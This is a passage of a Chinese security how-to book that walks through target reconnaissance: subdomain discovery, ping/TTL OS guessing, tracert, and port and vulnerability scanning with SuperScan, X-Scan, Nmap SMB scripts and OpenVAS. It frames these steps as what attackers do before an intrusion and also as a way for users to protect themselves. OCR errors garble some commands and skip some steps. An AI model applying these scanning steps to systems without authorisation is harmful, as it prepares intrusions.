cache 搜索百度里关于某些内容的缓存 


图 3-14 搜索结果
利用百度搜索引擎，我们可以轻松地得到想要的信息，还可以用它来收集数据库文件、 SQL注入，配置信息、源代码泄露，未授权访问和 robots.txt等敏感信息。当然，除了百度搜索引擎外，我们还可以在 Bing、Google等搜索引擎上搜索敏感信息。 

3.2.收集子域名信息
子域名是指顶级域名下的域名，也被称为二级域名。假设我们的目标网络规模较大，直接从主域中入手显然是很不理智的，因为对于规模化的目标，一般其主域名都是重点防护区域，所以不如直接进入目标的某个子域中，再想办法接近真正的目标。下面介绍收集子域名信息的方法。 
3.2.1.使用子域名检测工具
用于子域名检测的工具主要有 Layer子域名挖掘机、 K8、wydomain、dnsmaper、站长工具等。这里推荐使用 Layer子域名挖掘机和站长工具。 
Layer子域名挖掘机的使用方法比较简单，在域名对话框中直接输入域名就可以进行扫描，它显示的信息比较详细，有域名、解析 IP、开放端口、WEB服务器和网站状态等，如图 3-15所示。


图 3-15 Layer子域名挖掘机工作界面
站长工具是站长的必备工具。经常使
用站长工具可以了解站点的 SEO数据变

化，还可以进行网站死链接检测、蜘蛛访问、 
HTML格式检测、网站速度测试、友情链
接检查、域名和子域名查询等。站长工具
的使用方法比较简单，在域名对话框中直
接输入域名就可以进行子域名的查询了，
如图 3-16所示。 

3.2.2.使用搜索引擎查询
使用搜索引擎可以收集子域名信息，例如要搜索百度旗下的子域名就可以使用 site:baidu.com语句，如图 3-17所示。
图 3-16 查询子域名


图 3-17 使用搜索引擎查询子域名
3.2.3.使用第三方服务查询
很多第三方服务汇聚了大量 DNS数据库，通过它们可以检索某个给定域名的子域名。只需在其搜索栏中输入域名，就可以检索到相关的域名信息。例如，可以利用 DNSdumpster网站（ https:// dnsdumpster.com/）搜索出指定域潜藏的大量子域名。
在浏览器的地址栏中输入 https://dnsdumpster.com/网址，打开 DNSdumpster网站首页，在搜索文本框中输入 baidu.com，如图 3-18所示。

图 3-18 DNSdumpster网站首页
单击“搜索”按钮，即可显示出 baidu.com的查询信息。图 3-19所示为 DNS服务器信息。

图 3-19 DNS服务器信息
图 3-20所示为邮件服务器信息。


图 3-20 邮件服务器信息
图 3-21所示为查询到的子域名信息。


图 3-21 子域名信息
单击子域名下方的
图标，跳转到另一个网页，再单击“快速扫描”按钮，即可查看子域名开放的端口，如图 3-22所示。

图 3-22 子域名开放的端口 

3.3.网络中的踩点侦察
踩点，概括地说就是获取信息的过程。踩点是黑客实施攻击之前必须要做的工作之一，踩点过程中所获取的目标信息也决定着攻击是否成功。下面具体介绍实施踩点的具体流程，可以帮助用户更好地防护自己计算机的安全。 
3.3.1.侦察对方是否存在

微视频黑客在攻击之前，需要确定目标主机是否存在，目前确定目标主机是否存在最为常用的方法就
是使用 Ping命令。 Ping命令常用于对固定 IP地址的侦察，下面介绍侦察某网站的 IP地址的侦察步骤。 

Step01在 Windows 10系统界面中，右击“开始”按钮，在弹出的快捷菜单中单击“运行”菜单项，
打开“运行”对话框，在“打开”文本框中输入 cmd，如图 3-23所示。 
Step02单击“确定”按钮，打开“命令提示符”窗口，在其中输入 ping www.baidu.com，如图 3-24所示。

　　


　　图 3-23 “运行”对话框图 3-24 “命令提示符”窗口 

Step03按 Enter键，即可显示出 ping百度网站的结果，如果 ping通过了，将会显示该 IP地址返回的 byte、time和 TTL的值，说明该目标主机一定存在于网络之中，这样就具有了进一步攻击的条件，而且 time时间越短，表示响应的时间就越快，如图 3-25所示。 

Step04如果 ping不通过，则会出现“无法访问目标主机”提示信息，这就表明对方要么不在网络中，要么没有开机，要么是对方存在，但是设置了 ICMP数据包的过滤等。如图 3-26所示就是 ping IP地址为“192.168.0.100”不通的结果。

　　


图 3-25 ping百度网站的结果图 3-26 ping命令不通过的结果
注意：在 ping没有通过，且计算机又存在网络中的情况下，要想攻击该目标主机，就比较容易被发现，达到攻击目的就比较难。
另外，在实际侦察对方是否存在的过程中，如果一个 IP地址一个 IP地址地侦察，将会浪费很多精力和时间，那么有什么方法来解决这一问题呢？其实这个问题不难解决，因为目前网络上存在多种扫描工具，这些工具的功能非常强大，除了可以对一个 IP地址进行侦察，还可以对一个 IP地址范围内的主机进行侦察，从而得出目标主机是否存在，以及开放的端口和操作系统类型等，常用的工具有 SuperSsan、nmap等。
利用 SuperScan扫描 IP地址范围内的主机的操作步骤如下。 

Step01双击下载的 SuperScan可执行文件，打开 SuperScan操作界面，在“扫描”选项卡的“ IP地址”栏目中输入开始 IP和结束 IP，如图 3-27所示。

Step02单击“扫描”按钮，即可进行扫描。在扫描完毕之后，即可在 SuperScan操作界面中查看到扫描的结果，主要包括在该 IP地址范围内哪些主机是存在的，非常方便直观，如图 3-28所示。

　　


图 3-27 SuperScan操作界面图 3-28 扫描结果 

3.3.2.侦察对方的操作系统
黑客在入侵某台主机时，事先必须侦察出该计算机的操作系统类型，这样才能根据需要采取相
微视频应的攻击手段，以达到自己的攻击目的。常用侦察对方操作系统的方法为：使用 ping命令探知对方的操作系统。一般情况下，不同的操作系统其对应的 TTL返回值不相同， Windows操作系统对应的 TTL值一般为 128；Linux操作系统的 TTL值一般为 64。因此，黑客在使用 Ping命令与目标主机相连接时，可以根据不同的 TTL值来推测目标主机的操作系统类型，一般数值在 128左右的是 Windows系列，数值在 64左右的是 Linux系列。这是因为不同的操作系统的机器对 ICMP报文的处理与应答也有所不通，TTL的值是每过一个路由器就会减 1。在“运行”对话框中输入 cmd，单击“确定”按钮，打开 cmd命令行窗口，在其中输入 ping 
192.168.0.135，然后按 Enter键，即可返回 Ping到的数据信息，如图 3-29所示。

图 3-29 数据信息
分析上述操作代码结果，可以看到其返回 TTL值为 128，说明该主机的操作系统是一个 Windows操作系统。
3.3.3.侦察对方的网络结构
找到适合攻击的目标后，在正式实施入侵攻击之前，还需要了解目标主机的网络机构，只有弄

清楚目标网络中防火墙、服务器地址之后，才可进行第一步入侵。可以使用 tracert命令查看目标主微视频机的网络结构。 tracert命令用来显示数据包到达目标主机所经过的路径并显示到达每个节点的时间。 
tracert命令的功能同 Ping类似，但所获得的信息要比 Ping命令详细得多，它把数据包所走的全部路径、节点的 IP以及花费的时间都显示出来。该命令比较适用于大型网络。 tracert命令的格式： tracert IP地址或主机名。
例如：要想了解自己的计算机与目标主机 www.baidu.com之间的详细路径传递信息，就可以在“命令提示符”窗口中输入 tracert www.baidu.com命令进行查看，进而分析目标主机的网络结构，如图 3-30所示。 

3.4.确定可能开放的端口服务
服务器上所开放的端口往往是黑客潜在的入侵通道，对目标主机进行端口扫描能够获得许多有用的信息，而进行端口扫描的方法也很多，既可以手工进行扫描，也可以用端口扫描软件进行扫描。黑客常用的端口扫描器有 ScanPort扫描器、极速端口扫描器和 SuperScan扫描器等。 

图 3-30 目标主机的网络结构

3.4.1.ScanPort扫描器 
ScanPort软件不但可以用于网络扫描，同时还可以探测指定 IP及端口，速度比传统软件快，

且支持用户自设 IP端口又增加了其灵活性。具体的操作步骤如下。 微视频

Step01下载并运行 ScanPort程序，即可打开 ScanPort主窗口，在其中设置起始 IP地址、结束 
IP地址以及要扫描的端口号，如图 3-31所示。 

Step02单击“扫描”按钮，即可进行扫描，从扫描结果中可以看出设置的 IP地址段中计算机
开启的端口，如图 3-32所示。

　　


图 3-31 ScanPort主窗口图 3-32 开始扫描 

Step03如果要扫描某台计算机中开启的端口，则将起始 IP和结束 IP都设置为该主机的 IP地址，
如图 3-33所示。
41


Step04在设置完要扫描的端口号之后，单击“扫描”按钮，即可扫描出该主机中开启的端口（设
置端口范围之内），如图 3-34所示。


　　


　　图 3-33 设置单一主机的 IP 图 3-34 开始扫描单个主机的端口 
3.4.2.极速端口扫描器
极速端口扫描器是一款专门扫描端口的工具，利用该工具既可以扫描端口，也可以实现在线更
微视频新 IP地址，还可以将扫描结果导出为记事本、网页以及 XLS格式。使用该工具扫描端口的具体操作步骤如下。 

Step01下载并运行“极速端口扫描器 V2.0.500”，即可打开“极速端口扫描器”主窗口，如图 3-35
所示。 

Step02切换到“参数设置”选项，在其中即可看到该工具自带的 IP地址段以及各种参数，如
图 3-36所示。

　


图 3-35 “极速端口扫描器”主窗口　　图 3-36 “参数设置”选项卡 

Step03如果要对目标主机进行扫描，则需添加指定的 IP段。在“参数设置”选项卡中单击“增
加”按钮，即可打开“IP段编辑”对话框，如图 3-37所示。 

Step04在“开始 IP”和“结束 IP”文本框中分别输入 IP地址之后，单击“确定”按钮，即可
将该 IP段添加到“搜索 IP段设置”列表中，如图 3-38所示。 

Step05单击“全消”按钮，即可取消选择所有的 IP段，然后勾选刚添加的 IP段，并将要扫描
的端口设置为 445，如图 3-39所示。 

Step06设置完毕后，切换到“开始搜索”选项卡，并单击“开始搜索”按钮，即可扫描指定的 
IP段，最终的扫描结果如图 3-40所示。

　　


图 3-37 “IP段编辑”对话框图 3-38 设置要扫描的 IP段

　


图 3-39 选择要扫描的 IP段图 3-40 扫描指定的 IP段 

Step07可以将扫描的结果保存为记事本、网页、 XLS等格式。在“开始搜索”选项卡中单击“导
出”按钮，即可打开“另存为”对话框，如图 3-41所示。 

Step08设置完保存名称和路径后，单击“保存”按钮，即可将扫描结果保存为记事本文件格式。
打开保存的搜索结果，在其中即可看到搜索到的 IP地址以及搜索的端口，如图 3-42所示。


　　

图 3-41 “另存为”对话框图 3-42 记事本文件

3.4.3.SuperScan扫描器 
SuperScan是功能强大的端口扫描工具，可以扫描局域网内所有的活动主机或某一台主机所开
微视频放的端口。具体的操作步骤如下。 

在运行结果中可以看到以数字形式显示的 TCP和 UDP连接的端口号及其状态，如图 3-43所示。 
Step02启动 SuperScan程序，然后切换到“主机和服务器扫描设置”选项卡，在其中对想要扫描的 UDP和 TCP端口进行设置，如图 3-44所示。

　


　图 3-43 netstat -a -n命令图 3-44 设置 UDP和 TCP端口 


按钮，即可开始扫描地址，在扫描进程结束之后， SuperScan将提供一个主机列表，用于显示每台扫描过的主机被发现的开放端口信息，如图 3-46所示。

　


图 3-45 设置 IP地址段图 3-46 扫描开放端口信息 

Step05 SuperScan还有选择以 HTML格式显示信息的功能。单击“查看 HTML结果”按钮，即可显示扫描了哪些主机和在每台主机上哪些端口是开放的，并生成一份 HTML格式的报告，如图 3-47所示。

图 3-47 HTML格式的报告 
3.4.4.流光扫描器
利用流光扫描器可以轻松探测目标主机的开放端口，下面将以探测 POP3主机的开放端口为例

进行介绍。 微视频

Step01单击桌面上的流光扫描器程序图标，启动流光扫描器，如图 3-48所示。 

Step02单击“选项”→“系统设置”命令，打开“系统设置”对话框，对优先级、线程数、单
词数 /线程及扫描端口进行设置，如图 3-49所示。

　


　　　　图 3-48 流光扫描器图 3-49 “系统设置”对话框 

Step03在扫描器主窗口中勾选“ HTTP主机”复选框，然后右击，在弹出的快捷菜单中选择“编
辑”→“添加”命令，如图 3-50所示。 

Step04打开“添加主机（ HTTP）”对话框，在该对话框的下拉列表框中输入要扫描主机的 IP
地址（这里以 192.168.0.105）为例），如图 3-51所示。
45


　　


　　　　图 3-50 “添加”命令图 3-51 输入要扫描主机的 IP地址 

Step05此时在主窗口中将显示出刚刚添加的 HTTP主机，右击此主机，在弹出的快捷菜单中依
次选择“探测”→“扫描主机端口”命令，如图 3-52所示。 

Step06打开“端口探测设置”对话框，勾选“自定义端口探测范围”复选框，然后在“范围”
选项区中设置要探测端口的范围，如图 3-53所示。


　　


图 3-52 “扫描主机端口”命令图 3-53 设置要探测端口的范围 

Step07设置完成后，单击“确定”按钮，开始探测目标主机的开放端口，如图 3-54所示。 

Step08扫描完毕后，将会自动弹出“探测结果”对话框，如果目标主机存在开放端口，就会在
该对话框中显示出来，如图 3-55所示。



　　
　　图 3-54 探测目标主机的开放端口图 3-55 “探测结果”对话框

3.5.实战演练 
3.5.1.实战1：开启计算机 CPU最强性能
在 Windows 10操作系统之中，用户设置系统启动密码，具体的操作步骤如下。 


Step01按 WIN+R组合键，打开“运行”对话框，在“打开”文本框中输入 mscon.g，如图 3-56微视频所示。 

Step02单击“确定”按钮，在弹出的对话框中选择“引导”选项卡，如图 3-57所示。

　　


图 3-56 “运行”对话框图 3-57 “引导”选项卡 

Step03单击“高级选项”按钮，弹出“引导高级选项”对话框，勾选“处理器个数”复选框，
将处理器个数设置为最大值，本机最大值为 4，如图 3-58所示。 

Step04单击“确定”按钮，弹出“系统配置”对话框，单击“重新启动”按钮，重启计算机， 
CPU就能达到最大性能，这样计算机的运行速度就会明显提高，如图 3-59所示。


　　

图 3-58 “引导高级选项”对话框图 3-59 “系统配置”对话框
47


3.5.2.实战2：阻止流氓软件自动运行
在使用计算机时，可能会遇到流氓软件，如果不想程序自动运行，这时就需要用户阻止程序运
微视频行。具体的操作步骤如下。 
Step01按 WIN+R组合键，在打开的“运行”对话框中输入 gpedit.msc，如图 3-60所示。 

Step02单击“确定”按钮，打开“本地组策略编辑器”窗口，如图 3-61所示。



　　

图 3-60 “运行”对话框图 3-61 “本地组策略编辑器”窗口 

Step03依次展开“用户配置”→“管理模板”→“系统”文件，双击“不运行指定的 Windows
应用程序”选项，如图 3-62所示。

图 3-62 “系统”设置界面 

Step04打开“不运行指定的 Windows应用程序”窗口，选中“已启用”单选按钮，如图 3-63
所示。 

Step05单击下方的“显示…”按钮，打开“显示内容”窗口，在其中添加不允许的应用程序，
如图 3-64所示。 

Step06单击“确定”按钮，即可把想要阻止的程序名添加进去，此时，如果再运行此程序，就
会弹出相应的限制信息提示框了，如图 3-65所示。

图 3-63 选择“已启用”单选按钮

　　


　图 3-64 “显示内容”窗口　图 3-65 限制信息提示框

第章
4






系统漏洞的扫描与修补
漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，可使攻击者在未授权的情况下访问或破坏系统。本章介绍如何对网络中的主机进行漏洞扫描与修补。 
4.1.系统漏洞产生的原因
系统漏洞的产生不是安装不当的结果，也不是使用后的结果，客观上它是受编程人员的能力、经验和当时安全技术所限，在程序中难免会有的不足之处。
归结起来，系统漏洞产生的原因主要有以下几点。 
1.
人为因素


编程人员在编写程序过程中故意在程序代码的隐蔽位置保留了后门。 

2.
硬件因素


因为硬件的原因，编程人员无法弥补硬件的漏洞，从而使硬件问题通过软件表现出来。 

3.
客观因素



受编程人员的能力、经验和当时的安全技术及加密方法所限，在程序中不免存在不足之处，而这些不足恰恰会导致系统漏洞的产生。 

4.2.快速确定漏洞范围
黑客在找到攻击的目标主机后，在实施攻击之前，还需要查看目标主机的漏洞，确定目标主机微视频的漏洞范围。黑客为了能够快速找到目标主机的漏洞范围，常常会利用一些扫描工具来快速确定漏洞的范围，扫描的内容包括端口、弱口令、系统漏洞以及主机服务程序等。目前，黑客常用的扫描工具是 X-Scan，它可以扫描出操作系统类型及版本、标准端口状态及端口 BANNER信息、CGI漏洞、IIS漏洞、RPC漏洞等信息。 
4.2.1.设置 X-Scan扫描器
在使用 X-Scan扫描器扫描系统之前，需要先对该工具的一些属性进行设置，如扫描参数、检测范围等。设置和使用 X-Scan的具体操作步骤如下。 
Step01在 X-Scan文件夹中双击 X-Scan_gui.exe应用程序，打开 X-Scan v3.3 GUI主窗口，在其中可以浏览此软件的功能简介、常见问题解答等信息，如图 4-1所示。

Step02单击工具栏中的“扫描参数”
按钮，打开“扫描参数”窗口，如图 4-2所示。

　


图 4-1 X-Scan v3.3 GUI主窗口　　　　　图 4-2 “扫描参数”窗口 1 

Step03在左边的列表中单击“检测范围”选项卡，然后在“指定 IP范围”文本框中输入要扫
描的 IP地址范围。若不知道输入的格式，则可以单击“示例”按钮，即可打开“示例”对话框，在其中即可看到各种有效格式，如图 4-3所示。 

Step04切换到“全局设置”选项卡下，并单击其中的“扫描模块”子项，在其中即可选择扫描
过程中需要扫描的模块。在选择扫描模块的同时，还可在右侧窗格中查看选择的模块的相关说明，如图 4-4所示。

　　


　　　　图 4-3 “示例”对话框　　　　　　图 4-4 “全局设置”选项卡 

Step05由于 X-Scan是一款多线程扫描工具，所以可以在“并发扫描”子项中设置扫描时的线
程数量，如图 4-5所示。 

Step06选择“扫描报告”子项，在其中设置扫描报告存放的路径和文件格式，如图 4-6所示。
提示：如果需要保存自己设置的扫描 IP地址范围，则可在选择“保存主机列表”复选框后，输入保存文件名称，这样，以后就可以直接调用这些 IP地址范围；如果用户需要在扫描结束时自动生成报告文件并显示报告，则可选择“扫描完成后自动生成并显示报告”复选框。 

Step07选择“其他设置”子项，在其中设置扫描过程的其他属性，如设置扫描方式、显示详细
进度等，如图 4-7所示。


　


　　图 4-5 “并发扫描”子项图 4-6 “扫描报告”子项 

Step08切换到“插件设置”选项卡，并单击“端口相关设置”子项，在其中即可设置扫描端口
范围以及检测方式。X-Scan提供 TCP和 SYN两种扫描方式；若要扫描某主机的所有端口，则在“待检测端口”文本框中输入“1～ 65535”范围的端口号即可，如图 4-8所示。


　


　　图 4-7 “其他设置”子项　　　　图 4-8 “端口相关设置”子项 

Step09选择“ SNMP相关设置”子项，在其中通过勾选相应的复选框来设置在扫描时获取 
SNMP信息的内容，如图 4-9所示。 

Step10选择“ NETBIOS相关设置”子项，在其中勾选相应的复选框来设置需要获取的 
NETBIOS信息类型，如图 4-10所示。



　
　图 4-9 “SNMP相关设置”子项图 4-10 “NETBIOS相关设置”子项 

Step11选择“漏洞检测脚本设置”子项，取消勾选“全选”复选框之后，单击“选择脚本”按钮，
打开“Select Script”（选择脚本）窗口，如图 4-11所示。 

Step12在选择检测的脚本文件之后，单击“确定”按钮返回“扫描参数”对话框，并分别设置
脚本运行超时和网络读取超时等属性，如图 4-12所示。


　


　图 4-11 “选择脚本”窗口　　图 4-12 “扫描参数”窗口 2 

Step13选择“ CGI相关设置”子项，在其中即可设置扫描时需要使用的 CGI选项，如图 4-13所示。 

Step14选择“字典文件设置”子项，然后可以通过双击字典类型，打开“打开”对话框，如图 4-14
所示。

　


图 4-13 “CGI相关设置”子项图 4-14 “打开”对话框 

Step15在其中选择相应的字典文件后，单击“打开”按钮，返回“扫描参数”窗口即可完成字典类型所对应的字典文件名的设置。在设置好所有选项之后，单击“确定”按钮，即可完成设置，如图 4-15所示。

图 4-15 “扫描参数”窗口 3 

4.2.2.使用 X-Scan进行扫描
在设置完 X-Scan各个属性后，就可以利用该工具对指定 IP地址范围内的主机进行扫描。具体的操作步骤如下。 

Step01在 X-Scan v3.3 GUI主窗口中单击“开始扫描”按钮
，即可进行扫描，在扫描的同时
显示扫描进程和扫描所得到的信息，如图 4-16所示。 

Step02在扫描完成之后，即可看到 HTML格式的扫描报告，在其中可看到活动主机 IP地址、
存在的系统漏洞和其他安全隐患，如图 4-17所示。

　


　　图 4-16 扫描主机信息　　　　　　　图 4-17 HTML格式的扫描报告 

Step03在 X-Scan v3.3 GUI主窗口中切换到“漏洞信息”选项卡下，在其中即可看到存在漏洞
的主机信息，如图 4-18所示。

图 4-18 “漏洞信息”选项卡 
4.3.使用 Nmap扫描漏洞 

微视频Nmap工具自带有大量脚本，通过脚本配置规则，并配合 Nmap工具可以进行漏洞扫描。 
4.3.1.脚本管理 
Nmap有一个脚本数据库文件，使用该数据库可以对所有的脚本进行分类管理。查看脚本数据
库文件的方法为：在 usr/share/nmap/scripts目录中有一个 script.db文件，该文件用于维护 Nmap所有脚本文件，在 Kali Linux命令执行窗口中输入 cat script.db命令，即可查看数据库内容，执行结果如图 4-19所示。

图 4-19 数据库内容
每一个脚本后面都有一个分类（ categories）信息，分别是默认（ default）、发现（ discovery）、安全（ safe）、暴力（ brute）、入侵（ intrusive）、外部的（ external）、漏洞检测（ vuln）、漏洞利用（exploit）。
另外，如果执行 less script.db | wc -l命令，可以查看到目前 Nmap有 588个脚本，如图 4-20所示。

图 4-20 数据库的数量 
4.3.2.扫描漏洞
使用 Nmap的脚本文件可以扫描系统漏洞。下面以 smb-vuln-ms10-061.nse脚本为例介绍使用 Nmap进行漏洞扫描的方法。使用 Nmap扫描漏洞的操作步骤如下。 

Step01使用 less script.db | grep smb-vuln命令，筛选出符合标准的脚本文件，执行结果如图 4-21所示。

图 4-21 筛选脚本文件 1 

Step02使用 cat smb-vuln-ms10-061.nse命令，查看该脚本的帮助信息，执行结果如图 4-22所示，
可以看到 CVSS评分达到了 9.3分，因此这个漏洞是一个高危漏洞。

图 4-22 查看脚本帮助信息

Step03如果通过 smb-vuln-ms10-061.nse脚本没有发现任何漏洞，还可以尝试使用 smb-enum-
shares.nse脚本，这里使用 less script.db | grep smb-enum命令，筛选 smb-enum-shares.nse脚本文件，执行结果如图 4-23所示。

图 4-23 筛选脚本文件 2 

Step04使用 nmap -p445 192.168.1.105 --script=smb-enum-shares.nse命令，可以发现通过枚举脚本发现目标机器开放 445端口，执行结果如图 4-24所示。

图 4-24 扫描开放端口信息 

Step05使用 nmap -p 445 192.168.1.105 --script=smb-vuln-ms10-061命令，扫描主机发现并不存在该漏洞，这个在漏洞扫描中也很正常，并不是所有开放端口的机器都存在漏洞，执行结果如图 4-25所示。

图 4-25 扫描系统漏洞 

4.4.使用 OpenVAS扫描漏洞 
OpenVAS（Open Vulnerability Assessment System）是一个开放式漏洞评估系统，其核心部分是
微视频一个服务器。该服务器包括一套网络漏洞测试程序，可以检测远程系统或应用程序中的安全问题。 
4.4.1.安装 OpenVAS
默认情况下， Kali Linux并没有安装该扫描工具，因此想要使用它必须先安装。在 Kali Linux中安装 OpenVAS的操作步骤如下。 

Step01在 Kali Linux的命令执行界面中输入 apt-get install openvas命令，执行结果如图 4-26所示。


图 4-26 开始安装 OpenVAS 
Step02安装过程会提示将要安装哪些库及支持文件，并给出建议安装文件，如图 4-27所示。
图 4-27 安装文件列表 
Step03同时，在页面的下面会提示是否安装文件，如图 4-28所示。
图 4-28 提示是否安装文件 
Step04如果需要安装，这时可以按 y键执行安装，如图 4-29所示。

图 4-29 按 y键执行安装 

Step05耐心等待安装完成，这里会有一个初始密码，一定要先保存这个密码，否则无法登录系统，
如图 4-30所示。

图 4-30 显示初始密码提示：使用 openvasmd --user=admin --new-password=<新的密码 >命令，可以修改密码。 
Step06由于 OpenVAS是一个非常庞大的漏洞扫描库，因此安装过程中可能会出现文件缺少等错误，这时，可以使用 openvas-check-setup命令检查安装是否完整，如图 4-31所示。

图 4-31 检查安装是否完整
提示：在检查安装结果中，如果看到提示 OK，表明正常安装完成，如果出现错误，这里会给出尝试修复的建议。 

Step07如果安装完成忘记保存初始密码，可以通过 openvasmd --get-users命令，查看 OpenVAS中都有哪些用户。当然，如果是初次安装只会有一个管理员账号，如图 4-32所示。

图 4-32 检查管理员账号 

Step08由于 OpenVAS是安全漏洞扫描工具，为了保证扫描的准确性，建议经常对软件进行升级，这时可以使用 Updating OpenVAS feeds命令对 OpenVAS进行定期检查升级，如果存在升级会自动进行更新，这里截取了部分更新信息，如图 4-33所示。

图 4-33 升级软件 
4.4.2.登录 OpenVAS
安装完 OpenVAS软件，并设置好账号密码后，便可以登录 OpenVAS。OpenVAS采用 Web登录，管理起来非常方便。初次登录 OpenVAS需要一些简单的设置，具体的设置步骤如下。 

Step01 OpenVAS启动后会打开一些 939系列端口，使用 netstat -pantu | grep 939命令查看端口信息并过滤出 939系列端口，执行结果如图 4-34所示。其中 9390是 OpenVAS服务端口， 9392是 Web登录端口。

图 4-34 过滤端口信息 

Step02如果 9392端口开放，便说明 OpenVAS的服务已经启动，通过浏览器可以登录 Web页面，初次登录会有警告信息，如图 4-35所示。

图 4-35 警告信息 

Step03这是由于 OpenVAS采用 HTTPS加密传输协议，因此会提示安装证书问题，这时需在警告信息界面中单击 Advanced按钮，进入如图 4-36所示的界面。

图 4-36 查找警告信息
注意：如果是本机登录，可以使用“https://127.0.0.1:9392”这个地址进行登录。 
Step04单击 Add Exception按钮，会弹出一个确认添加证书警告信息，如图 4-37所示。

图 4-37 添加证书警告信息 

Step05单击 Con.rm Security Exception按钮，确认添加安全证书，并会跳转到如图 4-38所示的主页面，在其中输入管理员账号与密码。

图 4-38 管理员账号与密码页面 

Step06单击 Login按钮，进入如图 4-39所示的首页页面。

图 4-39 OpenVAS首页页面
注意：如果系统重启后，默认 OpenVAS是不启动的，这时就需要手动开启，手动开启的命令是 openvas-start，执行结果如图 4-40所示。

图 4-40 手动开启 OpenVAS 
4.4.3.配置 OpenVAS
登录 OpenVAS后，便可以配置相关扫描信息， OpenVAS提供了丰富的配置选项，既可以配置快速扫描选项，也可以手动配置个性化扫描选项。图 4-41所示为 OpenVAS框架的运行示意图。

图 4-41 OpenVAS框架的运行示意图
大致分为以下几个组件。 

● Scanner组件：用于扫描，它会从 NVT数据库中提取漏洞信息。 

● Mannager组件：用于管理 Sanner组件，所有的配置信息保存在 Con.gs数据库中。 

● CLI组件：指令控制组件，用于对 Mannager下达指令。 

● Security Assistant组件：用于分析扫描漏洞并生成报告文档。首次登录 OpenVAS，可以修改一些基本信息，操作步骤如下。 
Step01在 OpenVAS首页中，选择 Extras菜单，在打开的菜单列表中选择 My Settings命令，如


图 4-42所示。 
Step02在 OpenVAS中，如果需要修改信息，都可以找到一个类似扳手的图标，单击扳手图标，如图 4-43所示。



　　　　　

图 4-42 Extras菜单图 4-43 扳手图标 

Step03进入基本设置修改页面，如图 4-44所示，从这里可以修改时区、用户密码以及语言环境等。

图 4-44 基本设置修改页面 

Step04默认情况下， OpenVAS的漏洞评测标准是 NVD模式，如果需要修改，可以单击 Severity Class右侧的下拉按钮，在弹出的下拉列表中选择不同形式的评分标准，如图 4-45所示，其中包括 BSI、PCI-DSS等标准。 

图 4-45 选择不同的评分标准

Step05设置完成后，单击下方的 Save按钮，

即可保存设置，并退出基本设置修改页面。
4.4.4.自定义扫描
默认情况下， OpenVAS提供了多种扫描配置，不过这些都是通用的，如果需要针对某些特定的设备进行扫描，则需要自定义配置。 
1. 创建扫描对象

开始漏洞扫描之前需要确定扫描对象，而 OpenVAS中任何的动作都需要提前进行配置。创建扫描对象的操作步骤如下。 
Step01选择 Con.guration菜单，在打开的菜单列表中选择 Targets命令，如图 4-46所示。 

Step02在打开的页面中，单击左上角的“创建”图标
，创建目标对象，如图 4-47所示。


　　　　　　　　


　　　　　图 4-46 Targets命令　　　　图 4-47 “创建”图标 

Step03打开 New Target对话框，在其中输入目标名称，如图 4-48所示。目标地址有两种方式，一种是 Manual，可以直接输入 IP地址，多地址之间使用逗号分隔；另一种是 From file，可以将需要扫描的 IP地址保存成文件，最后导入该文件。

图 4-48 New Target对话框 

Step04选择需要扫描的端口，这里提供了非常多的选项，有针对 TCP/UDP协议的单独选项，还有针对常用端口的选项以及全端口扫描等。这时可以单击下拉按钮，在弹出的下拉列表中进行选择，如图 4-49所示，这里选择 OpenVAS Default选项，当然如果想自定义端口也可以单击右侧的“创建”图标自行创建。 

Step05主机探测也同样提供了丰富的选项，这里选择 Consider Alive选项，即使主机不响应探
测数据包，也依然认为主机是存活状态，并完成扫描，如图 4-50所示。

　　　　


图 4-49 选择需要扫描的端口　　　　　图 4-50 Consider Alive选项 

Step06基本选项都设置完成后，单击 Create按钮，即可完成创建，在返回的页面中可以看到已
经创建好的主机列表，如图 4-51所示。

图 4-51 添加主机列表
注意：在 Con.guration菜单项中有一个 Port Lists命令，通过这个命令可以修改扫描的端口，修改后的端口列表如图 4-52所示。

图 4-52 修改后的端口列表 
2. 创建扫描任务 

OpenVAs的扫描任务设置非常简单，可以设定在规定的时间进行扫描，也可设置周期性扫描，这样更加符合漏洞管理的要求。创建扫描任务的操作步骤如下。 
Step01创建一个扫描调度计划，选择 Con.guration菜单，在打开的菜单中选择 Schedules命令，如图 4-53所示。 

Step02在打开的页面中，单击左上角的“创建”图标
，创建一个扫描任务，如图 4-54所示。

　　　　　　　


图 4-53 Schedules菜单命令图 4-54 创建扫描任务 1 

Step03打开 Edit Schedules对话框，在其中设置调度的名称，可以选择初次扫描的时间，还可
以选择以后计划扫描的时间，如图 4-55所示。

图 4-55 Edit Schedule对话框

Step04设置完成后，单击 Save按钮，在返回的页面中可以看到刚刚设置的调度任务，如图 4-56
所示。

图 4-56 添加的调度任务 

Step05选择 Scans菜单，在打开的菜单中选择 Tasks命令，如图 4-57所示。 

Step06在打开的页面中，单击左上角的“创建”图标
，创建一个扫描任务，如图 4-58所示。


　　　　　　


　　　　图 4-57 Tasks命令图 4-58 创建扫描任务 2 

Step07打开 New Task对话框，在其中设置扫描任务的名称，还可以调用之前创建好的调度配置、
扫描配置等，如图 4-59所示。

图 4-59 New Task对话框 

Step08设置完成后，单击 Save按钮，在返回的页面中可以看到刚刚设置的扫描任务，如图 4-60
所示。

图 4-60 添加的扫描任务注意：右侧的时钟图标可以修改调度计划，类似播放按钮可以在计划启动后停止当前扫描任务。
3. 快速扫描

除了自定义扫描外， OpenVAS还提供了一个快速扫描设置，只需输入一个主机地址便可以开始快速扫描。进行快速扫描的操作步骤如下。 

Step01在创建扫描任务界面中有一个魔法棒图标
，如图 4-61所示。 


，便可以进入快速扫描设置界面，在 IP地址栏中输入一个主机地址，
如图 4-62所示。



　　

图 4-61 魔法棒图标　　　　图 4-62 快速扫描设置界面 

启动的扫描计划，如图 4-63所示。

图 4-63 启动扫描计划 


图 4-64 打开配置项 
4.4.5.查看扫描结果
当扫描进行到一定程度，不但可以看到扫描的进度状态，还可以查看目前已经扫描出的结果。查看扫描结果的操作步骤如下。

Step01扫描任务列表中的 Status项显示当前扫描的进度，如图 4-65所示。

图 4-65 显示扫描进度 

Step02单击 Status中的扫描进度，便可以打开已发现漏洞页面，如图 4-66所示，该页面会按照
漏洞威胁程度进行排列。

图 4-66 已发现漏洞页面 

Step03单击 Vulnerability中的任意一项，可以打开该漏洞的简要信息，如图 4-67所示，其中包括该漏洞的一个简要报告、存在的位置威胁程度以及修复建议等。

图 4-67 漏洞的简要信息 
4.5.系统漏洞的安全防护
要想防范系统的漏洞，首选就是及时为系统打补丁。下面介绍几种为系统打补丁的方法。
